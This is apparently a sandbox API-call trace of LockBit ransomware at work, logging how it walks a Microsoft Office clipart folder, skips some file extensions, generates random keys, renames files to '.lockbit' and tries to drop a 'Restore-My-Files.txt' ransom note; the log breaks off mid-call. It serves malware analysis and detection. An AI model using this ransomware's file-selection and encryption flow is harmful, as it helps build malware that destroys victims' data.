[0154.130] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.130] malloc (_Size=0x40068) returned 0x3df0008 [0154.130] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=73198) returned 1 [0154.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.132] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.132] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.137] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.137] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.137] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.140] free (_Block=0x1fa2ed8) [0154.140] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.140] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.140] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.140] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30398a00, ftCreationTime.dwHighDateTime=0x1bed30f, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x30398a00, ftLastWriteTime.dwHighDateTime=0x1bed30f, nFileSizeHigh=0x0, nFileSizeLow=0x94c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0281008.WMF", cAlternateFileName="")) returned 1 [0154.140] lstrcmpiW (lpString1=".", lpString2="J0281008.WMF") returned -1 [0154.140] lstrcmpiW (lpString1="..", lpString2="J0281008.WMF") returned -1 [0154.140] PathFindExtensionW (pszPath="J0281008.WMF") returned=".WMF" [0154.140] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.140] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.141] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.141] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.142] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0281008.WMF") returned 1 [0154.142] lstrcmpiW (lpString1="ntldr", lpString2="J0281008.WMF") returned 1 [0154.142] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0281008.WMF") returned 1 [0154.142] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0281008.WMF") returned -1 [0154.142] lstrcmpiW (lpString1="autorun.inf", lpString2="J0281008.WMF") returned -1 [0154.142] lstrcmpiW (lpString1="thumbs.db", lpString2="J0281008.WMF") returned 1 [0154.142] lstrcmpiW (lpString1="iconcache.db", lpString2="J0281008.WMF") returned -1 [0154.142] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.142] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF") returned=".WMF" [0154.142] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.143] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.143] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.144] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.144] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.144] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.144] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.144] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF.lockbit") returned 72 [0154.144] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281008.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.145] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.145] malloc (_Size=0x40068) returned 0x3df0008 [0154.145] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=38084) returned 1 [0154.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.146] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.153] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.153] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.153] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0154.153] free (_Block=0x1fa2ed8) [0154.153] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.153] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.154] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.154] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd40ff00, ftCreationTime.dwHighDateTime=0x1bed402, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd40ff00, ftLastWriteTime.dwHighDateTime=0x1bed402, nFileSizeHigh=0x0, nFileSizeLow=0xb5b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0281243.WMF", cAlternateFileName="")) returned 1 [0154.154] lstrcmpiW (lpString1=".", lpString2="J0281243.WMF") returned -1 [0154.154] lstrcmpiW (lpString1="..", lpString2="J0281243.WMF") returned -1 [0154.154] PathFindExtensionW (pszPath="J0281243.WMF") returned=".WMF" [0154.154] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.154] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.155] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.155] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0281243.WMF") returned 1 [0154.156] lstrcmpiW (lpString1="ntldr", lpString2="J0281243.WMF") returned 1 [0154.156] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0281243.WMF") returned 1 [0154.156] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0281243.WMF") returned -1 [0154.156] lstrcmpiW (lpString1="autorun.inf", lpString2="J0281243.WMF") returned -1 [0154.156] lstrcmpiW (lpString1="thumbs.db", lpString2="J0281243.WMF") returned 1 [0154.156] lstrcmpiW (lpString1="iconcache.db", lpString2="J0281243.WMF") returned -1 [0154.156] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.156] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF") returned=".WMF" [0154.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.156] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.156] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.157] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.157] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF.lockbit") returned 72 [0154.157] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281243.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.158] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.158] malloc (_Size=0x40068) returned 0x3df0008 [0154.159] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=46516) returned 1 [0154.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.160] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.164] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.164] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.165] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.167] free (_Block=0x1fa2ed8) [0154.167] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.167] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.167] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.168] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c757700, ftCreationTime.dwHighDateTime=0x1bee442, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c757700, ftLastWriteTime.dwHighDateTime=0x1bee442, nFileSizeHigh=0x0, nFileSizeLow=0x31dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0281630.WMF", cAlternateFileName="")) returned 1 [0154.168] lstrcmpiW (lpString1=".", lpString2="J0281630.WMF") returned -1 [0154.168] lstrcmpiW (lpString1="..", lpString2="J0281630.WMF") returned -1 [0154.168] PathFindExtensionW (pszPath="J0281630.WMF") returned=".WMF" [0154.168] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.168] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.169] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".sys", 